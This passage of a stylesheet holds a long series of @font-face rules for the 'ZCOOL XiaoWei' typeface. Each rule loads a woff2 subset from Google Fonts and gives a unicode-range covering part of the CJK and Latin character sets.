U+5fb3-5fb5, U+5fb9, U+5fbc;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.72.woff2) format(\'woff2\');unicode-range: U+5d26-5d27, U+5d2e-5d34, U+5d3c-5d3e, U+5d41-5d44, U+5d46-5d48, U+5d4a-5d4b, U+5d4e, U+5d50, U+5d52, U+5d55-5d58, U+5d5a-5d5d, U+5d68-5d69, U+5d6b-5d6c, U+5d6f, U+5d74, U+5d7f, U+5d82-5d89, U+5d8b-5d8c, U+5d8f, U+5d92-5d93, U+5d99, U+5d9d, U+5db2, U+5db6-5db7, U+5dba, U+5dbc-5dbd, U+5dc2-5dc3, U+5dc6-5dc7, U+5dc9, U+5dcc, U+5dd2, U+5dd4, U+5dd6-5dd8, U+5ddb-5ddc, U+5de3, U+5ded, U+5def, U+5df3, U+5df6, U+5dfa-5dfd, U+5dff-5e00, U+5e07, U+5e0f, U+5e11, U+5e13-5e14, U+5e19-5e1b, U+5e22, U+5e25, U+5e28, U+5e2a, U+5e2f-5e31, U+5e33-5e34, U+5e36, U+5e39-5e3c, U+5e3e, U+5e40, U+5e44, U+5e46-5e48, U+5e4c, U+5e4f, U+5e53-5e54, U+5e57, U+5e59, U+5e5b, U+5e5e-5e5f, U+5e61, U+5e63, U+5e6a-5e6b, U+5e75, U+5e77, U+5e79-5e7a, U+5e7e, U+5e80-5e81, U+5e83, U+5e85, U+5e87, U+5e8b, U+5e91-5e92, U+5e96;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.73.woff2) format(\'woff2\');unicode-range: U+5bec, U+5bee-5bf0, U+5bf2-5bf3, U+5bf5-5bf6, U+5bfe, U+5c02-5c03, U+5c05, U+5c07-5c09, U+5c0b-5c0c, U+5c0e, U+5c10, U+5c12-5c13, U+5c15, U+5c17, U+5c19, U+5c1b-5c1c, U+5c1e-5c1f, U+5c22, U+5c25, U+5c28, U+5c2a-5c2b, U+5c2f-5c30, U+5c37, U+5c3b, U+5c43-5c44, U+5c46-5c47, U+5c4d, U+5c50, U+5c59, U+5c5b-5c5c, U+5c62-5c64, U+5c66, U+5c6c, U+5c6e, U+5c74, U+5c78-5c7e, U+5c80, U+5c83-5c84, U+5c88, U+5c8b-5c8d, U+5c91, U+5c94-5c96, U+5c98-5c99, U+5c9c, U+5c9e, U+5ca1-5ca3, U+5cab-5cac, U+5cb1, U+5cb5, U+5cb7, U+5cba, U+5cbd-5cbf, U+5cc1, U+5cc3-5cc4, U+5cc7, U+5ccb, U+5cd2, U+5cd8-5cd9, U+5cdf-5ce0, U+5ce3-5ce6, U+5ce8-5cea, U+5ced, U+5cef, U+5cf3-5cf4, U+5cf6, U+5cf8, U+5cfd, U+5d00-5d04, U+5d06, U+5d08, U+5d0b-5d0d, U+5d0f-5d13, U+5d15, U+5d17-5d1a, U+5d1d-5d22, U+5d24-5d25;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.74.woff2) format(\'woff2\');unicode-range: U+5aa0, U+5aa3-5aa4, U+5aaa, U+5aae-5aaf, U+5ab1-5ab2, U+5ab4-5ab5, U+5ab7-5aba, U+5abd-5abf, U+5ac3-5ac4, U+5ac6-5ac8, U+5aca-5acb, U+5acd, U+5acf-5ad2, U+5ad4, U+5ad8-5ada, U+5adc, U+5adf-5ae2, U+5ae4, U+5ae6, U+5ae8, U+5aea-5aed, U+5af0-5af3, U+5af5, U+5af9-5afb, U+5afd, U+5b01, U+5b05, U+5b08, U+5b0b-5b0c, U+5b11, U+5b16-5b17, U+5b1b, U+5b21-5b22, U+5b24, U+5b27-5b2e, U+5b30, U+5b32, U+5b34, U+5b36-5b38, U+5b3e-5b40, U+5b43, U+5b45, U+5b4a-5b4b, U+5b51-5b53, U+5b56, U+5b5a-5b5b, U+5b62, U+5b65, U+5b67, U+5b6a-5b6e, U+5b70-5b71, U+5b73, U+5b7a-5b7b, U+5b7f-5b80, U+5b84, U+5b8d, U+5b91, U+5b93-5b95, U+5b9f, U+5ba5-5ba6, U+5bac, U+5bae, U+5bb8, U+5bc0, U+5bc3, U+5bcb, U+5bd0-5bd1, U+5bd4-5bd8, U+5bda-5bdc, U+5be2, U+5be4-5be5, U+5be7, U+5be9, U+5beb;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.75.woff2) format(\'woff2\');unicode-range: U+596a, U+596c-596e, U+5977, U+597b-597c, U+5981, U+598f, U+5997-5998, U+599a, U+599c-599d, U+59a0-59a1, U+59a3-59a4, U+59a7, U+59aa-59ad, U+59af, U+59b2-59b3, U+59b5-59b6, U+59b8, U+59ba, U+59bd-59be, U+59c0-59c1, U+59c3-59c4, U+59c7-59ca, U+59cc-59cd, U+59cf, U+59d2, U+59d5-59d6, U+59d8-59d9, U+59db, U+59dd-59e0, U+59e2-59e7, U+59e9-59eb, U+59ee, U+59f1, U+59f3, U+59f5, U+59f7-59f9, U+59fd, U+5a06, U+5a08-5a0a, U+5a0c-5a0d, U+5a11-5a13, U+5a15-5a16, U+5a1a-5a1b, U+5a21-5a23, U+5a2d-5a2f, U+5a32, U+5a38, U+5a3c, U+5a3e-5a45, U+5a47, U+5a4a, U+5a4c-5a4d, U+5a4f-5a51, U+5a53, U+5a55-5a57, U+5a5e, U+5a60, U+5a62, U+5a65-5a67, U+5a6a, U+5a6c-5a6d, U+5a72-5a73, U+5a75-5a76, U+5a79-5a7c, U+5a81-5a84, U+5a8c, U+5a8e, U+5a93, U+5a96-5a97, U+5a9c, U+5a9e;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.76.woff2) format(\'woff2\');unicode-range: U+5820, U+5822-5823, U+5825-5826, U+582c, U+582f, U+5831, U+583a, U+583d, U+583f-5842, U+5844-5846, U+5848, U+584a, U+584d, U+5852, U+5857, U+5859-585a, U+585c-585d, U+5862, U+5868-5869, U+586c-586d, U+586f-5873, U+5875, U+5879, U+587d-587e, U+5880-5881, U+5888-588a, U+588d, U+5892, U+5896-5898, U+589a, U+589c-589d, U+58a0-58a1, U+58a3, U+58a6, U+58a9, U+58ab-58ae, U+58b0, U+58b3, U+58bb-58bf, U+58c2-58c3, U+58c5-58c8, U+58ca, U+58cc, U+58ce, U+58d1-58d3, U+58d5, U+58d8-58d9, U+58de-58df, U+58e2, U+58e9, U+58ec, U+58ef, U+58f1-58f2, U+58f5, U+58f7-58f8, U+58fa, U+58fd, U+5900, U+5902, U+5906, U+5908-590c, U+590e, U+5910, U+5914, U+5919, U+591b, U+591d-591e, U+5920, U+5922-5925, U+5928, U+592c-592d, U+592f, U+5932, U+5936, U+593c, U+593e, U+5940-5942, U+5944, U+594c-594d, U+5950, U+5953, U+5958, U+595a, U+5961, U+5966-5968;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.77.woff2) format(\'woff2\');unicode-range: U+56f9, U+56fc, U+56ff-5700, U+5703-5704, U+5709-570a, U+570c-570d, U+570f, U+5712-5713, U+5718-5719, U+571c, U+571e, U+5725, U+5727, U+5729-572a, U+572c, U+572e-572f, U+5734-5735, U+5739, U+573b, U+5741, U+5743, U+5745, U+5749, U+574c-574d, U+575c, U+5763, U+5768-5769, U+576b, U+576d-576e, U+5770, U+5773, U+5775, U+5777, U+577b-577c, U+5785-5786, U+5788, U+578c, U+578e-578f, U+5793-5795, U+5799-57a1, U+57a3-57a4, U+57a6-57aa, U+57ac-57ad, U+57af-57b2, U+57b4-57b6, U+57b8-57b9, U+57bd-57bf, U+57c2, U+57c4-57c8, U+57cc-57cd, U+57cf, U+57d2, U+57d5-57de, U+57e1-57e2, U+57e4-57e5, U+57e7, U+57eb, U+57ed, U+57ef, U+57f4-57f8, U+57fc-57fd, U+5800-5801, U+5803, U+5805, U+5807, U+5809, U+580b-580e, U+5811, U+5814, U+5819, U+581b-581f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.78.woff2) format(\'woff2\');unicode-range: U+55f5-55f7, U+55fb, U+55fe, U+5600-5601, U+5605-5606, U+5608, U+560c-560d, U+560f, U+5614, U+5616-5617, U+561a, U+561c, U+561e, U+5621-5625, U+5627, U+5629, U+562b-5630, U+5636, U+5638-563a, U+563c, U+5640-5642, U+5649, U+564c-5650, U+5653-5655, U+5657-565b, U+5660, U+5663-5664, U+5666, U+566b, U+566f-5671, U+5673-567c, U+567e, U+5684-5687, U+568c, U+568e-5693, U+5695, U+5697, U+569b-569c, U+569e-569f, U+56a1-56a2, U+56a4-56a9, U+56ac-56af, U+56b1, U+56b4, U+56b6-56b8, U+56bf, U+56c1-56c3, U+56c9, U+56cd, U+56d1, U+56d4, U+56d6-56d9, U+56dd, U+56df, U+56e1, U+56e3-56e6, U+56e8-56ec, U+56ee-56ef, U+56f1-56f3, U+56f5, U+56f7-56f8;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.79.woff2) format(\'woff2\');unicode-range: U+550f, U+5511-5514, U+5516-5517, U+5519, U+551b, U+551d-551e, U+5520, U+5522-5523, U+5526-5527, U+552a-552c, U+5530, U+5532-5535, U+5537-5538, U+553b-5541, U+5543-5544, U+5547-5549, U+554b, U+554d, U+5550, U+5553, U+5555-5558, U+555b-555f, U+5567-5569, U+556b-5572, U+5574-5577, U+557b-557c, U+557e-557f, U+5581, U+5583, U+5585-5586, U+5588, U+558b-558c, U+558e-5591, U+5593, U+5599-559a, U+559f, U+55a5-55a6, U+55a8-55ac, U+55ae, U+55b0-55b3, U+55b6, U+55b9-55ba, U+55bc-55be, U+55c4, U+55c6-55c7, U+55c9, U+55cc-55d2, U+55d4-55db, U+55dd-55df, U+55e1, U+55e3-55e6, U+55ea-55ee, U+55f0-55f3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.80.woff2) format(\'woff2\');unicode-range: U+53e7-53e9, U+53f1, U+53f4-53f5, U+53fa-5400, U+5402, U+5405-5407, U+540b, U+540f, U+5412, U+5414, U+5416, U+5418-541a, U+541d, U+5420-5423, U+5425, U+5429-542a, U+542d-542e, U+5431-5433, U+5436, U+543d, U+543f, U+5442-5443, U+5449, U+544b-544c, U+544e, U+5451-5454, U+5456, U+5459, U+545b-545c, U+5461, U+5463-5464, U+546a-5472, U+5474, U+5476-5478, U+547a, U+547e-5484, U+5486, U+548a, U+548d-548e, U+5490-5491, U+5494, U+5497-5499, U+549b, U+549d, U+54a1-54a7, U+54a9, U+54ab, U+54ad, U+54b4-54b5, U+54b9, U+54bb, U+54be-54bf, U+54c2-54c3, U+54c9-54cc, U+54cf-54d0, U+54d3, U+54d5-54d6, U+54d9-54da, U+54dc-54de, U+54e2, U+54e7, U+54f3-54f4, U+54f8-54f9, U+54fd-54ff, U+5501, U+5504-5506, U+550c-550e;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.81.woff2) format(\'woff2\');unicode-range: U+5289, U+528b, U+528d, U+528f, U+5291-5293, U+529a, U+52a2, U+52a6-52a7, U+52ac-52ad, U+52af, U+52b4-52b5, U+52b9, U+52bb-52bc, U+52be, U+52c1, U+52c5, U+52ca, U+52cd, U+52d0, U+52d6-52d7, U+52d9, U+52db, U+52dd-52de, U+52e0, U+52e2-52e3, U+52e5, U+52e7-52f0, U+52f2-52f3, U+52f5-52f9, U+52fb-52fc, U+5302, U+5304, U+530b, U+530d, U+530f-5310, U+5315, U+531a, U+531c-531d, U+5321, U+5323, U+5326, U+532e-5331, U+5338, U+533c-533e, U+5344-5345, U+534b-534d, U+5350, U+5354, U+5358, U+535d-535f, U+5363, U+5368-5369, U+536c, U+536e-536f, U+5372, U+5379-537b, U+537d, U+538d-538e, U+5390, U+5393-5394, U+5396, U+539b-539d, U+53a0-53a1, U+53a3-53a5, U+53a9, U+53ad-53ae, U+53b0, U+53b2-53b3, U+53b5-53b8, U+53bc, U+53be, U+53c1, U+53c3-53c7, U+53ce-53cf, U+53d2-53d3, U+53d5, U+53da, U+53de-53df, U+53e1-53e2;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.82.woff2) format(\'woff2\');unicode-range: U+5104, U+5106-5107, U+5109-510b, U+510d, U+510f-5110, U+5113, U+5115, U+5117-5118, U+511a-511c, U+511e-511f, U+5121, U+5128, U+512b-512d, U+5131-5135, U+5137-5139, U+513c, U+5140, U+5142, U+5147, U+514c, U+514e-5150, U+5155-5158, U+5162, U+5169, U+5172, U+517f, U+5181-5184, U+5186-5187, U+518b, U+518f, U+5191, U+5195-5197, U+519a, U+51a2-51a3, U+51a6-51ab, U+51ad-51ae, U+51b1, U+51b4, U+51bc-51bd, U+51bf, U+51c3, U+51c7-51c8, U+51ca-51cb, U+51cd-51ce, U+51d4, U+51d6, U+51db-51dc, U+51e6, U+51e8-51eb, U+51f1, U+51f5, U+51fc, U+51ff, U+5202, U+5205, U+5208, U+520b, U+520d-520e, U+5215-5216, U+5228, U+522a, U+522c-522d, U+5233, U+523c-523d, U+523f-5240, U+5245, U+5247, U+5249, U+524b-524c, U+524e, U+5250, U+525b-525f, U+5261, U+5263-5264, U+5270, U+5273, U+5275, U+5277, U+527d, U+527f, U+5281-5285, U+5287;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.83.woff2) format(\'woff2\');unicode-range: U+4fd1, U+4fd3, U+4fda-4fdc, U+4fdf-4fe0, U+4fe2-4fe4, U+4fe6, U+4fe8, U+4feb-4fed, U+4ff3, U+4ff5-4ff6, U+4ff8, U+4ffe, U+5001, U+5005-5006, U+5009, U+500c, U+500f, U+5013-5018, U+501b-501e, U+5022-5025, U+5027-5028, U+502b-502e, U+5030, U+5033-5034, U+5036-5039, U+503b, U+5041-5043, U+5045-5046, U+5048-504a, U+504c-504e, U+5051, U+5053, U+5055-5057, U+505b, U+505e, U+5060, U+5062-5063, U+5067, U+506a, U+506c, U+5070-5072, U+5074-5075, U+5078, U+507b, U+507d-507e, U+5080, U+5088-5089, U+5091-5092, U+5095, U+5097-509e, U+50a2-50a3, U+50a5-50a7, U+50a9, U+50ad, U+50b3, U+50b5, U+50b7, U+50ba, U+50be, U+50c4-50c5, U+50c7, U+50ca, U+50cd, U+50d1, U+50d5-50d6, U+50da, U+50de, U+50e5-50e6, U+50ec-50ee, U+50f0-50f1, U+50f3, U+50f9-50fb, U+50fe-5102;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.84.woff2) format(\'woff2\');unicode-range: U+4ea3, U+4ea5, U+4eb0-4eb1, U+4eb3-4eb6, U+4eb8-4eb9, U+4ebb-4ebe, U+4ec2-4ec4, U+4ec8-4ec9, U+4ecc, U+4ecf-4ed0, U+4ed2, U+4eda-4edb, U+4edd-4ee1, U+4ee6-4ee9, U+4eeb, U+4eee-4eef, U+4ef3-4ef5, U+4ef8-4efa, U+4efc, U+4f00, U+4f03-4f05, U+4f08-4f09, U+4f0b, U+4f0e, U+4f12-4f13, U+4f15, U+4f1b, U+4f1d, U+4f21-4f22, U+4f25, U+4f27-4f29, U+4f2b-4f2e, U+4f31-4f33, U+4f36-4f37, U+4f39, U+4f3e, U+4f40-4f41, U+4f43, U+4f47-4f49, U+4f54, U+4f57-4f58, U+4f5d-4f5e, U+4f61-4f62, U+4f64-4f65, U+4f67, U+4f6a, U+4f6e-4f6f, U+4f72, U+4f74-4f7e, U+4f80-4f82, U+4f84, U+4f89-4f8a, U+4f8e-4f98, U+4f9e, U+4fa1, U+4fa5, U+4fa9-4faa, U+4fac, U+4fb3, U+4fb6-4fb8, U+4fbd, U+4fc2, U+4fc5-4fc6, U+4fcd-4fce, U+4fd0;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.85.woff2) format(\'woff2\');unicode-range: U+3129, U+3131, U+3134, U+3137, U+3139, U+3141-3142, U+3145, U+3147-3148, U+314b, U+314d-314e, U+315c, U+3160-3161, U+3163-3164, U+3186, U+318d, U+3192, U+3196-3198, U+319e-319f, U+3220-3229, U+3231, U+3268, U+3297, U+3299, U+32a3, U+338e-338f, U+3395, U+339c-339e, U+33c4, U+33d1-33d2, U+33d5, U+3434, U+34dc, U+34ee, U+353e, U+355d, U+3566, U+3575, U+3592, U+35a0-35a1, U+35ad, U+35ce, U+36a2, U+36ab, U+38a8, U+3dab, U+3de7, U+3deb, U+3e1a, U+3f1b, U+3f6d, U+4495, U+4723, U+48fa, U+4ca3, U+4db6-4dbf, U+4e02, U+4e04-4e06, U+4e0c, U+4e0f, U+4e15, U+4e17, U+4e1f-4e21, U+4e26, U+4e29, U+4e2c, U+4e2f, U+4e31, U+4e35, U+4e37, U+4e3c, U+4e3f-4e42, U+4e44, U+4e46-4e47, U+4e57, U+4e5a-4e5c, U+4e64-4e65, U+4e67, U+4e69, U+4e6d, U+4e78, U+4e7f-4e82, U+4e85, U+4e87, U+4e8a, U+4e8d, U+4e93, U+4e96, U+4e98-4e99, U+4e9c, U+4e9e-4ea0, U+4ea2;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.90.woff2) format(\'woff2\');unicode-range: U+207c-2083, U+208c-208e, U+2092, U+20a6, U+20a8-20ad, U+20af, U+20b1, U+20b4-20b5, U+20b8-20ba, U+20bd, U+20db, U+20dd, U+20e0, U+20e3, U+2105, U+2109, U+2113, U+2116-2117, U+2120-2121, U+2126, U+212b, U+2133, U+2139, U+2194, U+2196-2199, U+21a0, U+21a9-21aa, U+21af, U+21b3, U+21b5, U+21ba-21bb, U+21c4, U+21ca, U+21cc, U+21d0-21d4, U+21e1, U+21e6-21e9, U+2200, U+2202, U+2205-2208, U+220f, U+2211-2212, U+2215, U+2217-2219, U+221d-2220, U+2223, U+2225, U+2227-222b, U+222e, U+2234-2237, U+223c-223d, U+2248, U+224c, U+2252, U+2256, U+2260-2261, U+2266-2267, U+226a-226b, U+226e-226f, U+2282-2283, U+2295, U+2297, U+2299, U+22a5, U+22b0-22b1, U+22b9, U+22bf, U+22c5-22c6, U+22ef, U+2304, U+2307, U+230b, U+2312-2314, U+2318, U+231a-231b, U+2323, U+239b, U+239d-239e, U+23a0, U+23e9;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.91.woff2) format(\'woff2\');unicode-range: U+1d34-1d35, U+1d38-1d3a, U+1d3c, U+1d3f-1d40, U+1d49, U+1d4e-1d4f, U+1d52, U+1d55, U+1d5b, U+1d5e, U+1d9c, U+1da0, U+1dc4-1dc5, U+1e69, U+1e73, U+1ea0-1ea9, U+1eab-1ead, U+1eaf, U+1eb1, U+1eb3, U+1eb5, U+1eb7, U+1eb9, U+1ebb, U+1ebd-1ebe, U+1ec0-1ec3, U+1ec5-1ec6, U+1ec9-1ecd, U+1ecf-1ed3, U+1ed5, U+1ed7-1edf, U+1ee1, U+1ee3, U+1ee5-1eeb, U+1eed, U+1eef-1ef1, U+1ef3, U+1ef7, U+1ef9, U+1f62, U+1f7b, U+2001-2002, U+2004-2006, U+2009-200a, U+200c-2012, U+2015-2016, U+201a, U+201e-2021, U+2023, U+2025, U+2028, U+202a-202d, U+202f-2030, U+2032-2033, U+2035, U+2038, U+203c, U+203e-203f, U+2043-2044, U+2049, U+204d-204e, U+2060-2061, U+2070, U+2074-2078, U+207a-207b;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.97.woff2) format(\'woff2\');unicode-range: U+2ae-2b3, U+2b5-2bf, U+2c2-2c3, U+2c6-2d1, U+2d8-2da, U+2dc, U+2e1-2e3, U+2e5, U+2eb, U+2ee-2f0, U+2f2-2f7, U+2f9-2ff, U+302-30d, U+311, U+31b, U+321-325, U+327-329, U+32b-32c, U+32e-32f, U+331-339, U+33c-33d, U+33f, U+348, U+352, U+35c, U+35e-35f, U+361, U+363, U+368, U+36c, U+36f, U+530-540, U+55d-55e, U+561, U+563, U+565, U+56b, U+56e-579;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.99.woff2) format(\'woff2\');unicode-range: U+a1-a4, U+a6-a8, U+aa, U+ac, U+af, U+b1, U+b3-b6, U+b8-ba, U+bc-d6, U+d8-de, U+e6, U+eb, U+ee-f0, U+f5, U+f7-f8, U+fb, U+fd-100, U+102, U+104-107, U+10d, U+10f-112, U+115, U+117, U+119, U+11b, U+11e-11f, U+121, U+123, U+125-127, U+129-12a, U+12d, U+12f-13f, U+141-142, U+144, U+146, U+14b-14c, U+14f-153, U+158-15b, U+15e-160, U+163-165, U+168-16a, U+16d-175;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.100.woff2) format(\'woff2\');unicode-range: U+221a, U+2264, U+2464, U+25a0, U+3008, U+4e10, U+512a, U+5152, U+5201, U+5241, U+5340, U+5352, U+549a, U+54b2, U+54c6, U+54d7, U+54e1, U+5509, U+55c5, U+5618, U+5716, U+576f, U+5784, U+57a2, U+589f, U+5a20, U+5a25, U+5a29, U+5a34, U+5a7f, U+5ad6, U+5b09, U+5b5c, U+5bc7, U+5be6, U+5c27, U+5d2d, U+5dcd, U+5f1b, U+5f37, U+604d, U+6055, U+6073, U+60eb, U+61ff, U+62ce, U+62ed, U+6345, U+6390, U+63b0, U+63b7, U+64ae, U+64c2, U+64d2, U+6556, U+663c, U+667e, U+66d9, U+66f8, U+6756, U+6789, U+689d, U+68f1, U+695e, U+6975, U+6a1f, U+6b0a, U+6b61, U+6b87, U+6c5d, U+6c7e, U+6c92, U+6d31, U+6df9, U+6e0d, U+6e2d, U+6f31, U+6f3e, U+70b3, U+70bd, U+70ca, U+70e8, U+725f, U+733f, U+7396, U+739f, U+7459, U+74a7, U+75a1, U+75f0, U+76cf, U+76d4, U+7729, U+77aa, U+77b0, U+77e3, U+780c, U+78d5, U+7941, U+7977, U+797a, U+79c3, U+7a20, U+7a92, U+7b71, U+7bf1, U+7c9f, U+7eb6, U+7eca, U+7ef7, U+7f07, U+7f09, U+7f15, U+7f81, U+7fb9, U+8038, U+8098, U+80b4, U+8110, U+814b-814c, U+816e, U+818a, U+8205, U+8235, U+828b, U+82a5, U+82b7, U+82d4, U+82db, U+82df, U+8317, U+8338, U+8385-8386, U+83c1, U+83cf, U+8537, U+853b, U+854a, U+8715, U+8783, U+892a, U+8a71, U+8bb3, U+8d2e, U+8d58, U+8dbe, U+8f67, U+8fab, U+8fc4, U+8fe6, U+9023, U+9084, U+9091, U+916a, U+91c9, U+91dc, U+94b3, U+9502, U+9523, U+9551, U+956f, U+960e, U+962a, U+962e, U+9647, U+96f3, U+9739, U+97a0, U+97ed, U+983b, U+985e, U+988a, U+99ac, U+9a6f, U+9a87, U+9a8b, U+9ab7, U+9abc, U+9ac5, U+9e25, U+e608, U+e621, U+ff06, U+ff14-ff16;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.101.woff2) format(\'woff2\');unicode-range: U+161, U+926, U+928, U+939, U+93f-940, U+94d, U+e17, U+e22, U+e44, U+25c7, U+25ce, U+2764, U+3009, U+3016-3017, U+4e4d, U+4e53, U+4f5a, U+4f70, U+4fae, U+4fd8, U+4ffa, U+5011, U+501a, U+51c4, U+5225, U+547b, U+5495, U+54e8, U+54ee, U+5594, U+55d3, U+55dc, U+55fd, U+560e, U+565c, U+5662, U+5669, U+566c, U+56bc, U+5742, U+5824, U+5834, U+598a, U+5992, U+59a9, U+5a04, U+5ac9, U+5b75, U+5b7d, U+5bc5, U+5c49, U+5c90, U+5e1c, U+5e27, U+5e2b, U+5e37, U+5e90, U+618b, U+61f5, U+620a, U+620c, U+6273, U+62c7, U+62f7, U+6320, U+6342, U+6401-6402, U+6413, U+6512, U+655b, U+65a7, U+65f1, U+65f7, U+665f, U+6687, U+66a7, U+673d, U+67b8, U+6854, U+68d8, U+68fa, U+696d, U+6a02, U+6a0a, U+6a80, U+6b7c, U+6bd9, U+6c2e, U+6c76, U+6cf8, U+6d4a, U+6d85, U+6e24, U+6e32, U+6ec7, U+6f88, U+700f, U+701a, U+7078, U+707c, U+70ac, U+70c1, U+72e9, U+7409, U+7422, U+745a, U+7480, U+74a8, U+752b, U+7574, U+7656, U+7699, U+7737, U+785d, U+78be, U+79b9, U+7a3d, U+7a91, U+7a9f, U+7ae3, U+7b77, U+7c3f, U+7d1a, U+7d50, U+7d93, U+8042, U+808b, U+8236, U+82b8-82b9, U+82ef, U+8309, U+836b, U+83ef, U+8431, U+85c9, U+865e, U+868c, U+8759, U+8760, U+8845, U+89ba, U+8a2a, U+8aaa, U+8c41, U+8d2c, U+8d4e, U+8e66, U+8e6d, U+8eaf, U+902e, U+914b, U+916e, U+919b, U+949b, U+94a0, U+94b0, U+9541-9542, U+9556, U+95eb, U+95f5, U+964b, U+968b, U+96cc-96cd, U+96cf, U+9713, U+9890, U+98a8, U+9985, U+9992, U+9a6d, U+9a81, U+9a86, U+9ab8, U+9ca4, U+e606-e607, U+e60a, U+e60c, U+e60e, U+fe0f, U+ff02, U+ff1e;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.102.woff2) format(\'woff2\');unicode-range: U+10c, U+627-629, U+639, U+644, U+64a, U+203b, U+2265, U+2463, U+2573, U+25b2, U+3448-3449, U+4e1e, U+4e5e, 